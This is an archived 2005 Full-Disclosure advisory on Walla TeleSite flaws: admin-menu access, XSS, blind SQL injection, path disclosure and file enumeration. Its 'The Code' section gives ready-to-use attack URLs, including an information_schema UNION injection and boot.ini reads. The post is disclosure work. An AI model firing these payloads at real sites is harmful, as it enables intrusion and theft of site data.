lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 14 Nov 2005 17:58:14 +0200
From: "sinneR" <rafiware@...eqint.net>
To: <news@...uriteam.com>, <bugs@...uritytracker.com>,
	<bugtraq@...urityfocus.com>, <Full-Disclosure@...ts.grok.org.uk>,
	<firewall-wizards@...or.icsalabs.com>
Subject: Walla TeleSite Multiple Vulnerabilities


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    Walla TeleSite
Vendors:        http://www.walla.co.il
Versions:       3.0 and perior
Platforms:      Windows (ISAPI, a few vulnerabilities apply Linux too)
Bug:                Multiple Vulnerabilities
Exploitation:   Remote with browser
Date:              13 Nov 2005
Author:           Rafi Nahum, Pokerface
e-mail:            rafiware@...eqint.net
web:               Not Yet....but soon

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Walla TeleSite is a Website Content Managment CGI web application.
It is very common amoung big israeli websites. It also used as a wrapper to
all the website links. It is also used by Walla.co.il and the Walla.com
Network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The TeleSite wraps the website with templates and ids to all the links.
The main navigation page ts.exe receives a parameter called 'tsurl' and it
does
not verifies/limits the numbers it receives, for example it should receive
0.22.1.0
if there is such a page, but it shouldn't 0.1.0.0 because it leads to the
private articles
menu of administrator.

In addition, further input filtering is missing in the webpages
Get/Post/Cookie parameters, this is a "feature" missing to this software
which causes
the web programmers using this website content managment engine to think
their parameters
are filtered, well they are'nt and this causes all their clients to have
Script and SQL Injections.
Where it is obvious that an SQL Injection may lead to complete remote
compromise if the
website and XSS to content spoofing, phishing, cookie stealing, D.O.S
attacks and more.

The TeleSite application also does not saves the errors to itself...in an
error.log or something
similar, it informs the attacker with the local path of the files it could
not open/access when
the attacker tempares with the website parameters. A remote attacker can
also enumerate
all the files on the machine by supplying their full path to ts.cgi after
the querystring.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Articles Menu Access:
--------------------------------
 http://host/ts.exe?tsurl=0.1.0.0


Cross Site Scripting - XSS:
--------------------------------------

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr
ipt>alert()</script>


Blind SQL Injection:
-----------------------------
 Proof Of Concept:

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='1

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='2

 Exploitation:

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
y','poo','polo','nike'%20from%20information_schema.columns--


Local Path Disclosure:
-------------------------------
 D:\TeleSite\online\templates\\example\sections\header


Local File Enumeration:
---------------------------------
 http://host/ts.cgi?c:\boot.ini
 http://host/ts.cgi?c:\boot1.ini


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafi Nahum, Pokerface
Greetings to The-Insider

"Pokerface is the name, reputation follows."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists